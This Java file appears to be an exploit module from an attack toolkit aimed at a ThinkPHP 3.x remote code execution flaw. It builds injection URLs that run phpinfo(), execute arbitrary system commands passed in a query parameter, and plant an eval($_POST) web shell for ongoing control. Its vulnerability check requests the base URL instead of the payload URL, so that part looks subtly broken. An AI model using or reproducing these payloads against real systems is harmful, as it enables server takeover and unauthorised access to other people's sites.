package exploit;

import com.github.kevinsawicki.http.HttpRequest;
import util.BasePayload;
import util.Module;
import util.Result;

/**
 * Author 莲花 2021/6/20
 */
//thinkphp3.0
public class tp3 implements BasePayload {
    @Override
    public Result checkVUL(String url) throws Exception {
        String CheckStr = "PHP Version";
        Module m = new Module();
        String module = m.getModule(url);
        String payload = url + "/?s=" + module + "/\\think\\module/action/param1/${@phpinfo()}";
        try {
            HttpRequest req = HttpRequest.get(url);
            if (req.body().contains(CheckStr)) {
                return new Result(true, "ThinkPHP 3.x RCE", payload);
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new Result(false, "ThinkPHP 3.x RCE", "");
    }

    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        Module m = new Module();
        String module = m.getModule(url);
        String payload_url = url + "/?s=" + module + "/\\think\\module/action/param1/{${system($_GET['x'])}}?x=" + cmd;
        try {
            String res = HttpRequest.get(payload_url).body();
            return new Result(true, null, res);
        } catch (
                Exception e) {
            e.printStackTrace();
        }
        return new Result(false, null, null);
    }

    @Override
    public Result getShell(String url) throws Exception {
        try {
            Module m = new Module();
            String module = m.getModule(url);
            String shell_url = url + "/?s=" + module + "/\\think\\module/action/param1/{${eval($_POST['peiqi'])}}";
            int code = HttpRequest.get(shell_url).code();
            if (code == 200) {
                return new Result(true, null, shell_url);
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new Result(false, null, null);
    }
}
